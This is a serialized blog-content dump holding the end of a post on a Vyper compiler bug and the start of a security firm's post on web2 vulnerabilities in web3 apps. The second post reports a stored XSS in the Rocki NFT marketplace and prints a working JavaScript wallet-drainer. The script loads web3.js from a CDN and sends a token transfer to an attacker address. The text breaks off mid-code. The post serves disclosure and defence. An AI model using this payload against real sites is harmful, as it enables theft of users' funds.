minutes.",{"type":24,"tag":80,"props":37819,"children":37821},{"id":37820},"information-leakage",[37822],{"type":30,"value":37823},"Information Leakage",{"type":24,"tag":32,"props":37825,"children":37826},{},[37827],{"type":30,"value":37828},"I was both an auditor and a whitehat.",{"type":24,"tag":32,"props":37830,"children":37831},{},[37832,37834,37841],{"type":30,"value":37833},"There's a strong culture of publishing in auditing. We're paid for technical thought leadership and deep understanding of vulnerabilities. One way to demonstrate this is ",{"type":24,"tag":188,"props":37835,"children":37838},{"href":37836,"rel":37837},"https://twitter.com/osec_io/status/1579969927020412929",[192],[37839],{"type":30,"value":37840},"by publishing the \"scoop\"",{"type":30,"value":37842}," on hacks in the wild. Researchers cost a lot and the return on investment is publicity.",{"type":24,"tag":32,"props":37844,"children":37845},{},[37846],{"type":30,"value":37847},"On the other hand, there's a compelling argument that early disclosure of the affected versions had a material impact on the whitehat recovery.",{"type":24,"tag":32,"props":37849,"children":37850},{},[37851],{"type":30,"value":37852},"Half an hour more could have saved $18M.",{"type":24,"tag":32,"props":37854,"children":37855},{},[37856],{"type":30,"value":37857},"Auditors don't pay for externalities created by their reporting. Instead, they get rewarded with likes, retweets, and publicity. Seems like a hard problem.",{"type":24,"tag":43,"props":37859,"children":37861},{"id":37860},"next-steps",[37862],{"type":30,"value":37863},"Next Steps",{"type":24,"tag":32,"props":37865,"children":37866},{},[37867],{"type":30,"value":37868},"I disagree with takes like \"we need formal verification to solve this\". This bug could have been caught with a unit test. Formal verification is very useful for many bug classes, but I'm not convinced it's as useful for relatively simple, non-optimizing compilers.",{"type":24,"tag":32,"props":37870,"children":37871},{},[37872,37874,37881],{"type":30,"value":37873},"It's important to note that this bug ",{"type":24,"tag":188,"props":37875,"children":37878},{"href":37876,"rel":37877},"https://twitter.com/real_philogy/status/1685948253139857409",[192],[37879],{"type":30,"value":37880},"was patched since November 2021",{"type":30,"value":206},{"type":24,"tag":9770,"props":37883,"children":37884},{},[37885],{"type":24,"tag":32,"props":37886,"children":37887},{},[37888,37890,37895,37896,37899,37901,37906],{"type":30,"value":37889},"I think this Vyper 0day is less about the skill of the Vyper team or the language itself but more about ",{"type":24,"tag":5422,"props":37891,"children":37892},{},[37893],{"type":30,"value":37894},"processes",{"type":30,"value":6319},{"type":24,"tag":37724,"props":37897,"children":37898},{},[],{"type":30,"value":37900},"\nThe bug was a fixed many versions of Vyper ago, the actual oversight was not realizing the potential impact to projects at the time it ",{"type":24,"tag":5422,"props":37902,"children":37903},{},[37904],{"type":30,"value":37905},"was",{"type":30,"value":37907}," fixed.",{"type":24,"tag":32,"props":37909,"children":37910},{},[37911],{"type":30,"value":37912},"Unfortunately, public goods get easily forgotten. With immutable contracts, projects can have implicit dependencies on code written years ago. Protocol developers and security experts should stay up to date on security developments across the entire execution stack.",{"type":24,"tag":25200,"props":37914,"children":37916},{"className":37915,"dataFootnotes":7},[25203],[37917,37922],{"type":24,"tag":43,"props":37918,"children":37920},{"className":37919,"id":22269},[25208],[37921],{"type":30,"value":25211},{"type":24,"tag":6246,"props":37923,"children":37924},{},[37925],{"type":24,"tag":2659,"props":37926,"children":37927},{"id":37122},[37928,37930],{"type":30,"value":37929},"Thankfully, these funds were later returned. ",{"type":24,"tag":188,"props":37931,"children":37933},{"href":37150,"ariaLabel":25313,"className":37932,"dataFootnoteBackref":7},[25315],[37934],{"type":30,"value":25318},{"type":24,"tag":9672,"props":37936,"children":37937},{},[37938],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":37940},[37941,37942,37946,37947],{"id":37217,"depth":320,"text":37220},{"id":37784,"depth":320,"text":37787,"children":37943},[37944,37945],{"id":37799,"depth":335,"text":37802},{"id":37820,"depth":335,"text":37823},{"id":37860,"depth":320,"text":37863},{"id":22269,"depth":320,"text":25211},"content:blog:2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline.md","blog/2023-08-01-vyper-timeline",{"_path":37952,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":37953,"description":37954,"author":37955,"image":37958,"date":37960,"isFeatured":16,"tags":37961,"onBlogPage":16,"body":37964,"_type":9700,"_id":42164,"_source":9702,"_file":42165,"_stem":42166,"_extension":9705},"/blog/2023-08-11-web2-bug-repellant-instructions","Web2 Bug Repellant Instructions","An analysis of security risks that don’t get enough attention - web2 bugs in web3 apps. We take a deep and practical look at vulnerabilities across various applications.",[37956,37957],"caue","bruno",{"src":37959,"height":15,"width":15},"/posts/web2-bug-repellant-instructions/web2-bug-repellant-instructions.jpg","2023-08-11",[37962,37963],"nft-marketplaces","xss",{"type":21,"children":37965,"toc":42147},[37966,37970,37975,37979,37984,37989,37994,38010,38016,38029,38051,38058,38063,38070,38075,38081,38086,38091,38096,38101,38112,38117,39080,39090,39102,39109,39114,39935,39940,39945,39950,39955,40739,40744,40824,40829,40898,40904,40909,40914,41141,41154,41159,41164,41169,41176,41181,41188,41194,41199,41204,41209,41527,41532,41538,41554,41560,41565,41570,41580,41585,41590,41599,41604,41610,41626,41639,41644,41649,41669,41676,41681,41688,41697,41702,41723,41776,41781,41832,41846,41851,41864,41979,42002,42085,42108,42113,42118,42122,42127,42132,42138,42143],{"type":24,"tag":43,"props":37967,"children":37968},{"id":35771},[37969],{"type":30,"value":35774},{"type":24,"tag":32,"props":37971,"children":37972},{},[37973],{"type":30,"value":37974},"Transitioning to a fully decentralized web is hard. Many Web 3 applications still have large, unexplored Web 2 attack surfaces.",{"type":24,"tag":80,"props":37976,"children":37977},{"id":9755},[37978],{"type":30,"value":9758},{"type":24,"tag":32,"props":37980,"children":37981},{},[37982],{"type":30,"value":37983},"In this blog post, we'll explore these lingering threats and potential mitigations. This work summarizes our internal research against various applications, from NFT marketplaces to wallets to protocol frontends.",{"type":24,"tag":32,"props":37985,"children":37986},{},[37987],{"type":30,"value":37988},"As a note, generally applications with non-trivial frontends are more susceptible to these vulnerabilities. Hence, a lot of our research focused on the interactions with NFTs, an ideal Web 2.5 candidate in many senses.",{"type":24,"tag":43,"props":37990,"children":37991},{"id":37963},[37992],{"type":30,"value":37993},"XSS",{"type":24,"tag":32,"props":37995,"children":37996},{},[37997],{"type":24,"tag":5422,"props":37998,"children":37999},{},[38000,38002,38009],{"type":30,"value":38001},"I cannot make you understand. I cannot make anyone understand what is happening inside me. I cannot ",{"type":24,"tag":188,"props":38003,"children":38006},{"href":38004,"rel":38005},"https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting",[192],[38007],{"type":30,"value":38008},"even explain it to myself",{"type":30,"value":206},{"type":24,"tag":80,"props":38011,"children":38013},{"id":38012},"managing-metadata",[38014],{"type":30,"value":38015},"Managing Metadata",{"type":24,"tag":32,"props":38017,"children":38018},{},[38019,38021,38028],{"type":30,"value":38020},"Effectively managing metadata is a challenge. When improperly sanitized, unsuspecting metadata becomes a dangerous sink for malicious ",{"type":24,"tag":188,"props":38022,"children":38025},{"href":38023,"rel":38024},"https://www.vice.com/en/article/xgdvaz/nft-steal-ip-address-opensea",[192],[38026],{"type":30,"value":38027},"payloads",{"type":30,"value":206},{"type":24,"tag":32,"props":38030,"children":38031},{},[38032,38034,38041,38043,38049],{"type":30,"value":38033},"We showcase this vulnerability in the ",{"type":24,"tag":188,"props":38035,"children":38038},{"href":38036,"rel":38037},"https://rocki.com/",[192],[38039],{"type":30,"value":38040},"Rocki Marketplace",{"type":30,"value":38042},". The ",{"type":24,"tag":145,"props":38044,"children":38046},{"className":38045},[],[38047],{"type":30,"value":38048},"artistDescription",{"type":30,"value":38050}," parameter was improperly sanitized, allowing arbitrary HTML input without any validation checks!",{"type":24,"tag":32,"props":38052,"children":38053},{},[38054],{"type":24,"tag":177,"props":38055,"children":38057},{"alt":7,"src":38056},"/posts/web2-bug-repellant-instructions/metadata.png",[],{"type":24,"tag":32,"props":38059,"children":38060},{},[38061],{"type":30,"value":38062},"When a user loads such a maliciously constructed NFT, they'll unwittingly execute our payload, giving us full control over their account.",{"type":24,"tag":32,"props":38064,"children":38065},{},[38066],{"type":24,"tag":177,"props":38067,"children":38069},{"alt":7,"src":38068},"/posts/web2-bug-repellant-instructions/xss.png",[],{"type":24,"tag":32,"props":38071,"children":38072},{},[38073],{"type":30,"value":38074},"Of course, this is merely a toy payload. An actual hacker could use this to spread through the marketplace, creating a wormable payload that takes over the entire website.",{"type":24,"tag":80,"props":38076,"children":38078},{"id":38077},"wheres-my-wallet",[38079],{"type":30,"value":38080},"Where's My Wallet",{"type":24,"tag":32,"props":38082,"children":38083},{},[38084],{"type":30,"value":38085},"What's the worst that can happen? How does losing your wallet funds sound?",{"type":24,"tag":32,"props":38087,"children":38088},{},[38089],{"type":30,"value":38090},"Note that triggering this exploit requires some interaction. However, in practice users likely are not carefully examining the wallet prompts, especially on familiar sites.",{"type":24,"tag":32,"props":38092,"children":38093},{},[38094],{"type":30,"value":38095},"It is important to recognize that the presence of XSS in marketplaces can trigger the approval prompt in various wallets, including the attacker's assets.",{"type":24,"tag":32,"props":38097,"children":38098},{},[38099],{"type":30,"value":38100},"In the following example, this malicious transaction was initiated by a malicious code injected into rocki.com.",{"type":24,"tag":38102,"props":38103,"children":38105},"div",{"style":38104},"display:flex; align-items:center; flex-direction:column;",[38106],{"type":24,"tag":177,"props":38107,"children":38111},{"src":38108,"alt":38109,"style":38110},"/posts/web2-bug-repellant-instructions/metamask.png","Wallet","max-height:550px;",[],{"type":24,"tag":32,"props":38113,"children":38114},{},[38115],{"type":30,"value":38116},"And here we can find the code used to achieve it :",{"type":24,"tag":291,"props":38118,"children":38122},{"className":38119,"code":38120,"language":38121,"meta":7,"style":7},"language-js shiki shiki-themes slack-dark","function request() {\n if (typeof window.ethereum === 'undefined') {\n console.error('Please install MetaMask to use this feature.');\n } else {\n ethereum.request({ method: 'eth_requestAccounts' }).then((accounts) => {\n const fromAddress = accounts[0];\n const attackerAddress = '0x0000000000000000000000000000000000000000';\n const contractAddress = '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3';\n\n let tokenAbi = [\n {\n constant: false,\n inputs: [\n {\n name: '_to',\n type: 'address',\n },\n {\n name: '_value',\n type: 'uint256',\n },\n ],\n name: 'transfer',\n outputs: [\n {\n name: '',\n type: 'bool',\n },\n ],\n type: 'function',\n },\n ];\n\n const web3 = new Web3(window.ethereum);\n\n const tokenContract = new web3.eth.Contract(tokenAbi, contractAddress);\n\n const transactionObject = {\n from: fromAddress,\n to: contractAddress,\n data: tokenContract.methods\n .transfer(attackerAddress, web3.utils.toWei('100000000', 'ether'))\n .encodeABI(),\n };\n\n web3.eth.sendTransaction(transactionObject);\n });\n }\n}\n\nimport('https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js');\nsetTimeout(request, 1e3);\n","js",[38123],{"type":24,"tag":145,"props":38124,"children":38125},{"__ignoreMap":7},[38126,38142,38187,38215,38231,38293,38327,38352,38377,38384,38404,38412,38428,38440,38448,38465,38482,38490,38497,38513,38529,38536,38544,38561,38573,38580,38596,38612,38619,38626,38643,38650,38658,38665,38712,38719,38783,38790,38810,38826,38842,38863,38934,38950,38957,38964,39002,39010,39017,39024,39031,39051],{"type":24,"tag":301,"props":38127,"children":38128},{"class":303,"line":304},[38129,38133,38138],{"type":24,"tag":301,"props":38130,"children":38131},{"style":348},[38132],{"type":30,"value":3205},{"type":24,"tag":301,"props":38134,"children":38135},{"style":314},[38136],{"type":30,"value":38137}," request",{"type":24,"tag":301,"props":38139,"children":38140},{"style":359},[38141],{"type":30,"value":3883},{"type":24,"tag":301,"props":38143,"children":38144},{"class":303,"line":320},[38145,38150,38154,38159,38164,38168,38173,38178,38183],{"type":24,"tag":301,"props":38146,"children":38147},{"style":308},[38148],{"type":30,"value":38149}," if",{"type":24,"tag":301,"props":38151,"children":38152},{"style":359},[38153],{"type":30,"value":873},{"type":24,"tag":301,"props":38155,"children":38156},{"style":348},[38157],{"type":30,"value":38158},"typeof",{"type":24,"tag":301,"props":38160,"children":38161},{"style":369},[38162],{"type":30,"value":38163}," window",{"type":24,"tag":301,"props":38165,"children":38166},{"style":359},[38167],{"type":30,"value":206},{"type":24,"tag":301,"props":38169,"children":38170},{"style":369},[38171],{"type":30,"value":38172},"ethereum",{"type":24,"tag":301,"props":38174,"children":38175},{"style":385},[38176],{"type":30,"value":38177}," ===",{"type":24,"tag":301,"props":38179,"children":38180},{"style":329},[38181],{"type":30,"value":38182}," 'undefined'",{"type":24,"tag":301,"props":38184,"children":38185},{"style":359},[38186],{"type":30,"value":398},{"type":24,"tag":301,"props":38188,"children":38189},{"class":303,"line":335},[38190,38194,38198,38202,38206,38211],{"type":24,"tag":301,"props":38191,"children":38192},{"style":369},[38193],{"type":30,"value":3481},{"type":24,"tag":301,"props":38195,"children":38196},{"style":359},[38197],{"type":30,"value":206},{"type":24,"tag":301,"props":38199,"children":38200},{"style":314},[38201],{"type":30,"value":21654},{"type":24,"tag":301,"props":38203,"children":38204},{"style":359},[38205],{"type":30,"value":362},{"type":24,"tag":301,"props":38207,"children":38208},{"style":329},[38209],{"type":30,"value":38210},"'Please install MetaMask to use this feature.'",{"type":24,"tag":301,"props":38212,"children":38213},{"style":359},[38214],{"type":30,"value":589},{"type":24,"tag":301,"props":38216,"children":38217},{"class":303,"line":344},[38218,38223,38227],{"type":24,"tag":301,"props":38219,"children":38220},{"style":359},[38221],{"type":30,"value":38222}," } ",{"type":24,"tag":301,"props":38224,"children":38225},{"style":308},[38226],{"type":30,"value":10144},{"type":24,"tag":301,"props":38228,"children":38229},{"style":359},[38230],{"type":30,"value":3035},{"type":24,"tag":301,"props":38232,"children":38233},{"class":303,"line":401},[38234,38239,38243,38248,38253,38258,38263,38268,38273,38277,38281,38285,38289],{"type":24,"tag":301,"props":38235,"children":38236},{"style":369},[38237],{"type":30,"value":38238}," ethereum",{"type":24,"tag":301,"props":38240,"children":38241},{"style":359},[38242],{"type":30,"value":206},{"type":24,"tag":301,"props":38244,"children":38245},{"style":314},[38246],{"type":30,"value":38247},"request",{"type":24,"tag":301,"props":38249,"children":38250},{"style":359},[38251],{"type":30,"value":38252},"({ ",{"type":24,"tag":301,"props":38254,"children":38255},{"style":369},[38256],{"type":30,"value":38257},"method:",{"type":24,"tag":301,"props":38259,"children":38260},{"style":329},[38261],{"type":30,"value":38262}," 'eth_requestAccounts'",{"type":24,"tag":301,"props":38264,"children":38265},{"style":359},[38266],{"type":30,"value":38267}," }).",{"type":24,"tag":301,"props":38269,"children":38270},{"style":314},[38271],{"type":30,"value":38272},"then",{"type":24,"tag":301,"props":38274,"children":38275},{"style":359},[38276],{"type":30,"value":4827},{"type":24,"tag":301,"props":38278,"children":38279},{"style":369},[38280],{"type":30,"value":21467},{"type":24,"tag":301,"props":38282,"children":38283},{"style":359},[38284],{"type":30,"value":911},{"type":24,"tag":301,"props":38286,"children":38287},{"style":348},[38288],{"type":30,"value":4841},{"type":24,"tag":301,"props":38290,"children":38291},{"style":359},[38292],{"type":30,"value":3035},{"type":24,"tag":301,"props":38294,"children":38295},{"class":303,"line":415},[38296,38301,38306,38310,38315,38319,38323],{"type":24,"tag":301,"props":38297,"children":38298},{"style":348},[38299],{"type":30,"value":38300}," const",{"type":24,"tag":301,"props":38302,"children":38303},{"style":369},[38304],{"type":30,"value":38305}," fromAddress",{"type":24,"tag":301,"props":38307,"children":38308},{"style":385},[38309],{"type":30,"value":2537},{"type":24,"tag":301,"props":38311,"children":38312},{"style":369},[38313],{"type":30,"value":38314}," accounts",{"type":24,"tag":301,"props":38316,"children":38317},{"style":359},[38318],{"type":30,"value":541},{"type":24,"tag":301,"props":38320,"children":38321},{"style":466},[38322],{"type":30,"value":584},{"type":24,"tag":301,"props":38324,"children":38325},{"style":359},[38326],{"type":30,"value":1423},{"type":24,"tag":301,"props":38328,"children":38329},{"class":303,"line":439},[38330,38334,38339,38343,38348],{"type":24,"tag":301,"props":38331,"children":38332},{"style":348},[38333],{"type":30,"value":38300},{"type":24,"tag":301,"props":38335,"children":38336},{"style":369},[38337],{"type":30,"value":38338}," attackerAddress",{"type":24,"tag":301,"props":38340,"children":38341},{"style":385},[38342],{"type":30,"value":2537},{"type":24,"tag":301,"props":38344,"children":38345},{"style":329},[38346],{"type":30,"value":38347}," '0x0000000000000000000000000000000000000000'",{"type":24,"tag":301,"props":38349,"children":38350},{"style":359},[38351],{"type":30,"value":492},{"type":24,"tag":301,"props":38353,"children":38354},{"class":303,"line":447},[38355,38359,38364,38368,38373],{"type":24,"tag":301,"props":38356,"children":38357},{"style":348},[38358],{"type":30,"value":38300},{"type":24,"tag":301,"props":38360,"children":38361},{"style":369},[38362],{"type":30,"value":38363}," contractAddress",{"type":24,"tag":301,"props":38365,"children":38366},{"style":385},[38367],{"type":30,"value":2537},{"type":24,"tag":301,"props":38369,"children":38370},{"style":329},[38371],{"type":30,"value":38372}," '0xa01000c52b234a92563ba61e5649b7c76e1ba0f3'",{"type":24,"tag":301,"props":38374,"children":38375},{"style":359},[38376],{"type":30,"value":492},{"type":24,"tag":301,"props":38378,"children":38379},{"class":303,"line":476},[38380],{"type":24,"tag":301,"props":38381,"children":38382},{"emptyLinePlaceholder":16},[38383],{"type":30,"value":341},{"type":24,"tag":301,"props":38385,"children":38386},{"class":303,"line":495},[38387,38391,38396,38400],{"type":24,"tag":301,"props":38388,"children":38389},{"style":348},[38390],{"type":30,"value":14890},{"type":24,"tag":301,"props":38392,"children":38393},{"style":369},[38394],{"type":30,"value":38395}," tokenAbi",{"type":24,"tag":301,"props":38397,"children":38398},{"style":385},[38399],{"type":30,"value":2537},{"type":24,"tag":301,"props":38401,"children":38402},{"style":359},[38403],{"type":30,"value":32377},{"type":24,"tag":301,"props":38405,"children":38406},{"class":303,"line":504},[38407],{"type":24,"tag":301,"props":38408,"children":38409},{"style":359},[38410],{"type":30,"value":38411}," {\n",{"type":24,"tag":301,"props":38413,"children":38414},{"class":303,"line":512},[38415,38420,38424],{"type":24,"tag":301,"props":38416,"children":38417},{"style":369},[38418],{"type":30,"value":38419}," constant:",{"type":24,"tag":301,"props":38421,"children":38422},{"style":348},[38423],{"type":30,"value":3613},{"type":24,"tag":301,"props":38425,"children":38426},{"style":359},[38427],{"type":30,"value":1729},{"type":24,"tag":301,"props":38429,"children":38430},{"class":303,"line":592},[38431,38436],{"type":24,"tag":301,"props":38432,"children":38433},{"style":369},[38434],{"type":30,"value":38435}," inputs:",{"type":24,"tag":301,"props":38437,"children":38438},{"style":359},[38439],{"type":30,"value":32377},{"type":24,"tag":301,"props":38441,"children":38442},{"class":303,"line":619},[38443],{"type":24,"tag":301,"props":38444,"children":38445},{"style":359},[38446],{"type":30,"value":38447}," {\n",{"type":24,"tag":301,"props":38449,"children":38450},{"class":303,"line":635},[38451,38456,38461],{"type":24,"tag":301,"props":38452,"children":38453},{"style":369},[38454],{"type":30,"value":38455}," name:",{"type":24,"tag":301,"props":38457,"children":38458},{"style":329},[38459],{"type":30,"value":38460}," '_to'",{"type":24,"tag":301,"props":38462,"children":38463},{"style":359},[38464],{"type":30,"value":1729},{"type":24,"tag":301,"props":38466,"children":38467},{"class":303,"line":643},[38468,38473,38478],{"type":24,"tag":301,"props":38469,"children":38470},{"style":369},[38471],{"type":30,"value":38472}," type:",{"type":24,"tag":301,"props":38474,"children":38475},{"style":329},[38476],{"type":30,"value":38477}," 'address'",{"type":24,"tag":301,"props":38479,"children":38480},{"style":359},[38481],{"type":30,"value":1729},{"type":24,"tag":301,"props":38483,"children":38484},{"class":303,"line":652},[38485],{"type":24,"tag":301,"props":38486,"children":38487},{"style":359},[38488],{"type":30,"value":38489}," },\n",{"type":24,"tag":301,"props":38491,"children":38492},{"class":303,"line":666},[38493],{"type":24,"tag":301,"props":38494,"children":38495},{"style":359},[38496],{"type":30,"value":38447},{"type":24,"tag":301,"props":38498,"children":38499},{"class":303,"line":674},[38500,38504,38509],{"type":24,"tag":301,"props":38501,"children":38502},{"style":369},[38503],{"type":30,"value":38455},{"type":24,"tag":301,"props":38505,"children":38506},{"style":329},[38507],{"type":30,"value":38508}," '_value'",{"type":24,"tag":301,"props":38510,"children":38511},{"style":359},[38512],{"type":30,"value":1729},{"type":24,"tag":301,"props":38514,"children":38515},{"class":303,"line":692},[38516,38520,38525],{"type":24,"tag":301,"props":38517,"children":38518},{"style":369},[38519],{"type":30,"value":38472},{"type":24,"tag":301,"props":38521,"children":38522},{"style":329},[38523],{"type":30,"value":38524}," 'uint256'",{"type":24,"tag":301,"props":38526,"children":38527},{"style":359},[38528],{"type":30,"value":1729},{"type":24,"tag":301,"props":38530,"children":38531},{"class":303,"line":3631},[38532],{"type":24,"tag":301,"props":38533,"children":38534},{"style":359},[38535],{"type":30,"value":38489},{"type":24,"tag":301,"props":38537,"children":38538},{"class":303,"line":3639},[38539],{"type":24,"tag":301,"props":38540,"children":38541},{"style":359},[38542],{"type":30,"value":38543}," ],\n",{"type":24,"tag":301,"props":38545,"children":38546},{"class":303,"line":3647},[38547,38552,38557],{"type":24,"tag":301,"props":38548,"children":38549},{"style":369},[38550],{"type":30,"value":38551}," name:",{"type":24,"tag":301,"props":38553,"children":38554},{"style":329},[38555],{"type":30,"value":38556}," 'transfer'",{"type":24,"tag":301,"props":38558,"children":38559},{"style":359},[38560],{"type":30,"value":1729},{"type":24,"tag":301,"props":38562,"children":38563},{"class":303,"line":3685},[38564,38569],{"type":24,"tag":301,"props":38565,"children":38566},{"style":369},[38567],{"type":30,"value":38568}," outputs:",{"type":24,"tag":301,"props":38570,"children":38571},{"style":359},[38572],{"type":30,"value":32377},{"type":24,"tag":301,"props":38574,"children":38575},{"class":303,"line":3713},[38576],{"type":24,"tag":301,"props":38577,"children":38578},{"style":359},[38579],{"type":30,"value":38447},{"type":24,"tag":301,"props":38581,"children":38582},{"class":303,"line":3721},[38583,38587,38592],{"type":24,"tag":301,"props":38584,"children":38585},{"style":369},[38586],{"type":30,"value":38455},{"type":24,"tag":301,"props":38588,"children":38589},{"style":329},[38590],{"type":30,"value":38591}," ''",{"type":24,"tag":301,"props":38593,"children":38594},{"style":359},[38595],{"type":30,"value":1729},{"type":24,"tag":301,"props":38597,"children":38598},{"class":303,"line":3751},[38599,38603,38608],{"type":24,"tag":301,"props":38600,"children":38601},{"style":369},[38602],{"type":30,"value":38472},{"type":24,"tag":301,"props":38604,"children":38605},{"style":329},[38606],{"type":30,"value":38607}," 'bool'",{"type":24,"tag":301,"props":38609,"children":38610},{"style":359},[38611],{"type":30,"value":1729},{"type":24,"tag":301,"props":38613,"children":38614},{"class":303,"line":3782},[38615],{"type":24,"tag":301,"props":38616,"children":38617},{"style":359},[38618],{"type":30,"value":38489},{"type":24,"tag":301,"props":38620,"children":38621},{"class":303,"line":3791},[38622],{"type":24,"tag":301,"props":38623,"children":38624},{"style":359},[38625],{"type":30,"value":38543},{"type":24,"tag":301,"props":38627,"children":38628},{"class":303,"line":3819},[38629,38634,38639],{"type":24,"tag":301,"props":38630,"children":38631},{"style":369},[38632],{"type":30,"value":38633}," type:",{"type":24,"tag":301,"props":38635,"children":38636},{"style":329},[38637],{"type":30,"value":38638}," 'function'",{"type":24,"tag":301,"props":38640,"children":38641},{"style":359},[38642],{"type":30,"value":1729},{"type":24,"tag":301,"props":38644,"children":38645},{"class":303,"line":4397},[38646],{"type":24,"tag":301,"props":38647,"children":38648},{"style":359},[38649],{"type":30,"value":32129},{"type":24,"tag":301,"props":38651,"children":38652},{"class":303,"line":4405},[38653],{"type":24,"tag":301,"props":38654,"children":38655},{"style":359},[38656],{"type":30,"value":38657}," ];\n",{"type":24,"tag":301,"props":38659,"children":38660},{"class":303,"line":4422},[38661],{"type":24,"tag":301,"props":38662,"children":38663},{"emptyLinePlaceholder":16},[38664],{"type":30,"value":341},{"type":24,"tag":301,"props":38666,"children":38667},{"class":303,"line":4438},[38668,38672,38677,38681,38686,38691,38695,38700,38704,38708],{"type":24,"tag":301,"props":38669,"children":38670},{"style":348},[38671],{"type":30,"value":38300},{"type":24,"tag":301,"props":38673,"children":38674},{"style":369},[38675],{"type":30,"value":38676}," web3",{"type":24,"tag":301,"props":38678,"children":38679},{"style":385},[38680],{"type":30,"value":2537},{"type":24,"tag":301,"props":38682,"children":38683},{"style":348},[38684],{"type":30,"value":38685}," new",{"type":24,"tag":301,"props":38687,"children":38688},{"style":314},[38689],{"type":30,"value":38690}," Web3",{"type":24,"tag":301,"props":38692,"children":38693},{"style":359},[38694],{"type":30,"value":362},{"type":24,"tag":301,"props":38696,"children":38697},{"style":369},[38698],{"type":30,"value":38699},"window",{"type":24,"tag":301,"props":38701,"children":38702},{"style":359},[38703],{"type":30,"value":206},{"type":24,"tag":301,"props":38705,"children":38706},{"style":369},[38707],{"type":30,"value":38172},{"type":24,"tag":301,"props":38709,"children":38710},{"style":359},[38711],{"type":30,"value":589},{"type":24,"tag":301,"props":38713,"children":38714},{"class":303,"line":4446},[38715],{"type":24,"tag":301,"props":38716,"children":38717},{"emptyLinePlaceholder":16},[38718],{"type":30,"value":341},{"type":24,"tag":301,"props":38720,"children":38721},{"class":303,"line":4506},[38722,38726,38731,38735,38739,38743,38747,38752,38756,38761,38765,38770,38774,38779],{"type":24,"tag":301,"props":38723,"children":38724},{"style":348},[38725],{"type":30,"value":38300},{"type":24,"tag":301,"props":38727,"children":38728},{"style":369},[38729],{"type":30,"value":38730}," tokenContract",{"type":24,"tag":301,"props":38732,"children":38733},{"style":385},[38734],{"type":30,"value":2537},{"type":24,"tag":301,"props":38736,"children":38737},{"style":348},[38738],{"type":30,"value":38685},{"type":24,"tag":301,"props":38740,"children":38741},{"style":369},[38742],{"type":30,"value":38676},{"type":24,"tag":301,"props":38744,"children":38745},{"style":359},[38746],{"type":30,"value":206},{"type":24,"tag":301,"props":38748,"children":38749},{"style":369},[38750],{"type":30,"value":38751},"eth",{"type":24,"tag":301,"props":38753,"children":38754},{"style":359},[38755],{"type":30,"value":206},{"type":24,"tag":301,"props":38757,"children":38758},{"style":314},[38759],{"type":30,"value":38760},"Contract",{"type":24,"tag":301,"props":38762,"children":38763},{"style":359},[38764],{"type":30,"value":362},{"type":24,"tag":301,"props":38766,"children":38767},{"style":369},[38768],{"type":30,"value":38769},"tokenAbi",{"type":24,"tag":301,"props":38771,"children":38772},{"style":359},[38773],{"type":30,"value":377},{"type":24,"tag":301,"props":38775,"children":38776},{"style":369},[38777],{"type":30,"value":38778},"contractAddress",{"type":24,"tag":301,"props":38780,"children":38781},{"style":359},[38782],{"type":30,"value":589},{"type":24,"tag":301,"props":38784,"children":38785},{"class":303,"line":4566},[38786],{"type":24,"tag":301,"props":38787,"children":38788},{"emptyLinePlaceholder":16},[38789],{"type":30,"value":341},{"type":24,"tag":301,"props":38791,"children":38792},{"class":303,"line":4574},[38793,38797,38802,38806],{"type":24,"tag":301,"props":38794,"children":38795},{"style":348},[38796],{"type":30,"value":38300},{"type":24,"tag":301,"props":38798,"children":38799},{"style":369},[38800],{"type":30,"value":38801}," transactionObject",{"type":24,"tag":301,"props":38803,"children":38804},{"style":385},[38805],{"type":30,"value":2537},{"type":24,"tag":301,"props":38807,"children":38808},{"style":359},[38809],{"type":30,"value":3035},{"type":24,"tag":301,"props":38811,"children":38812},{"class":303,"line":4590},[38813,38818,38822],{"type":24,"tag":301,"props":38814,"children":38815},{"style":369},[38816],{"type":30,"value":38817}," from:",{"type":24,"tag":301,"props":38819,"children":38820},{"style":369},[38821],{"type":30,"value":38305},{"type":24,"tag":301,"props":38823,"children":38824},{"style":359},[38825],{"type":30,"value":1729},{"type":24,"tag":301,"props":38827,"children":38828},{"class":303,"line":4599},[38829,38834,38838],{"type":24,"tag":301,"props":38830,"children":38831},{"style":369},[38832],{"type":30,"value":38833}," to:",{"type":24,"tag":301,"props":38835,"children":38836},{"style":369},[38837],{"type":30,"value":38363},{"type":24,"tag":301,"props":38839,"children":38840},{"style":359},[38841],{"type":30,"value":1729},{"type":24,"tag":301,"props":38843,"children":38844},{"class":303,"line":4629},[38845,38850,38854,38858],{"type":24,"tag":301,"props":38846,"children":38847},{"style":369},[38848],{"type":30,"value":38849}," data:",{"type":24,"tag":301,"props":38851,"children":38852},{"style":369},[38853],{"type":30,"value":38730},{"type":24,"tag":301,"props":38855,"children":38856},{"style":359},[38857],{"type":30,"value":206},{"type":24,"tag":301,"props":38859,"children":38860},{"style":369},[38861],{"type":30,"value":38862},"methods\n",{"type":24,"tag":301,"props":38864,"children":38865},{"class":303,"line":4659},[38866,38871,38876,38880,38885,38889,38894,38898,38903,38907,38912,38916,38921,38925,38930],{"type":24,"tag":301,"props":38867,"children":38868},{"style":359},[38869],{"type":30,"value":38870}," .",{"type":24,"tag":301,"props":38872,"children":38873},{"style":314},[38874],{"type":30,"value":38875},"transfer",{"type":24,"tag":301,"props":38877,"children":38878},{"style":359},[38879],{"type":30,"value":362},{"type":24,"tag":301,"props":38881,"children":38882},{"style":369},[38883],{"type":30,"value":38884},"attackerAddress",{"type":24,"tag":301,"props":38886,"children":38887},{"style":359},[38888],{"type":30,"value":377},{"type":24,"tag":301,"props":38890,"children":38891},{"style":369},[38892],{"type":30,"value":38893},"web3",{"type":24,"tag":301,"props":38895,"children":38896},{"style":359},[38897],{"type":30,"value":206},{"type":24,"tag":301,"props":38899,"children":38900},{"style":369},[38901],{"type":30,"value":38902},"utils",{"type":24,"tag":301,"props":38904,"children":38905},{"style":359},[38906],{"type":30,"value":206},{"type":24,"tag":301,"props":38908,"children":38909},{"style":314},[38910],{"type":30,"value":38911},"toWei",{"type":24,"tag":301,"props":38913,"children":38914},{"style":359},[38915],{"type":30,"value":362},{"type":24,"tag":301,"props":38917,"children":38918},{"style":329},[38919],{"type":30,"value":38920},"'100000000'",{"type":24,"tag":301,"props":38922,"children":38923},{"sty